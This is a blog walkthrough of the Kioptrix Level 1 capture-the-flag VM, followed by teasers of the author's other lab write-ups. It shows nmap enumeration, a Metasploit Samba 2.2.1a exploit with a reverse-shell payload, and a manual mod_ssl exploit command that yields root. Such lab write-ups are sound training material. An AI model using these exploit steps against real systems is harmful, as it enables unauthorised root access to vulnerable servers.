Skip to main content

KIOPTRIX LEVEL 1 WALKTHROUGH WITH AND WITHOUT METASPLOIT


Kioptrix Level 1 is a beginner level CTF challenge.
You can download this virtual machine from here
Details of Kioptrix :
Size----186 MB
OS---Linux

Note:
In virtual box, set up a Bridged network (virtual box -> preferences -> network) in networking, put both your Kali and Kioptrix to Bridged network.
Fire-up both the machines(Kali and Kioptrix Level 1)

Kioptrix will ask for the logins which we don't know at the moment. This also means we can't find IP of the Kioptrix directly from the Kioptrix machine itself.
Leave the Kioptrix machine as it is and switch to Kali.
First we need to find the IP address of the Kioptrix machine.
We will use the tool netdiscover that comes pre-installed in Kali Linux to identify the IP address.
Command
 sudo netdiscover -i eth0


Wait  for scan results.


192.168.233.130 seems to be the IP of the Kioptrix machine.
Let's scan this IP address using the tool Nmap (scan will also verify that its the IP of Kioptrix machine)
Command 
sudo nmap -sSVC 192.168.233.130
This command will run the scan to perform SYN scan(three way handshake) , Version and OS detection.
 

There are 5 open ports, but these seems to be much juicy.
*******************************************************************************
First we go with metasploit method.
Port 139 enumeration:
We can see some info about Samba smb. 
Fire-up your metasploit using the command msfconsole
We are going for smb version detection module of metasploit , search for the module using the command 
search smb_version


We get a matching module, lets use the this module via command use 0
Use the command options to see various parameters that need to be filled.


We need to set the RHOSTS (Kioptrix machine IP) , use the command 
set rhosts 192.168.233.130 
and run the scanner.


We get some info about the host, i.e. Samba 2.2.1a
Let's search if any exploit is present regarding Samba 2.2.1a
I found one on Rapid7.


Scroll down and copy the module's exploit.

Paste the exploit path in metasploit.
Payload is set to default. 
Use command options to see fields required to be filled.


We need to set the rhosts and also change the payload.
(It is required to change the payload from default to non-meterpreter shell as the default payload is very unstable and the meterpreter shell will die immediately).
Change the payload using the command 
set payload linux/x86/shell_reverse_tcp


Run the exploit.


We get a session , and guess what we are root user already.
To find the root flag scroll down to bottom of this blog.
Happy hacking ;)

**********************************************************************************
Moving to the other method (getting the root without metasploit).
Port 80/443 enumeration :
We see some info about mod_ssl 2.8.4 
Search for related exploit on Google and you will see a GitHub repository.


Clone this , according to instructions below.

Instead of Op****ck name I saved it as open


We run the open file first and select the appropriate target for us. 


Scroll down and see what are the various targets.


0x6b matches our requirements (we may need to run various other to find a working one).
Let's use it in the required/mentioned format(as given in GitHub repository).
Use command 
./open 192.168.233.130 443 -c 40


We get a shell.
And guess what we are root again.

Happy hacking ;)


*********************************************************************************

Let's grab the root flag.

Use command cd /var/mail and cat command to read the root file.

That's all for this machine.

Comments

Post a Comment

Popular posts from this blog

Beginners Code Review Part 1

  Image credits to  Leobit This is a walkthrough of an exercise created by  PentesterLab  as a free course for learning beginner-friendly source code review. The link to the source code is here . Either clone it or download it as a zip locally. As instructed in the exercise we won't run the run, just read through the source code and look for possible weaknesses that we can leverage into vulnerabilities. LIST OF WEAKNESSES You can find below the list of issues present in the application: Hardcoded credentials or secrets Information leak Missing security flags Weak password hashing mechanism Cross-Site Scripting No CSRF protection Directory Listing Crypto issue Signature bypass Authentication bypass Authorization bypass Remote Code Execution Hand-On Findings and Objectives * Hardcoded credentials or secrets      ...
Post a Comment
Read more

VULNHUB INFOSEC PREP : OSCP

Welcome to the walkthrough of InfoSec Prep: OSCP walkthrough. It is a beginner-level boot2root machine and it can be downloaded from  here . I cracked this machine literally 5 minutes after it booted properly. So you can consider this machine the easiest.  Hint: Nmap Finding secret.txt and decoding it. Login via ssh. Privilege escalation to root via SUID binary.  Boot up the machine and it should show the IP address. We start off by pinging the box to verify that the box is up and running and we can reach out to it. Command: ping <IP> Then we can run Nmap scan to look for open ports and services running on the box. We will use -sC for running default scripts, -sV for Version/Service info and -T4 for faster execution, and -o for saving the result on a file named nmap The command is: sudo nmap -sC -sV -T4 <IP> -o filename Looking at the scan results, port 22 is open and running ssh, and port 80 is open, and it's running Apache. We can also see a directory named ...
Post a Comment
Read more

HTB LAME WALKTHROUGH

HackTheBox  is an excellent platform for various pen-testers to increase their testing skills and increasing knowledge. Machine Level -Easy Machine Name -Lame Machine OS -Linux Machine IP -10.10.10.3 Tools: Nmap  -Nmap is a fantastic tool for scanning open ports, services, and OS detection. You can use other tools other than Nmap (whichever you are more comfortable with ) like Masscan, SPARTA, etc to scan for open ports. Metasploit  -One of the most common and widely used tools by pen-testers to launch exploits, it is maintained by Rapid 7. Many books are available to understand the features of this tool. We will be performing the attack by two methodologies (using and without using Metasploit). Methodology 1 (using Metasploit) Scanning the machine is the first step(i.e. Enumeration). We use the following Nmap command, nmap -sSVC 10.10.10.3 (we can run the command with sudo privileges if an error occurs regarding privileges.) The command scans f...
Post a Comment
Read more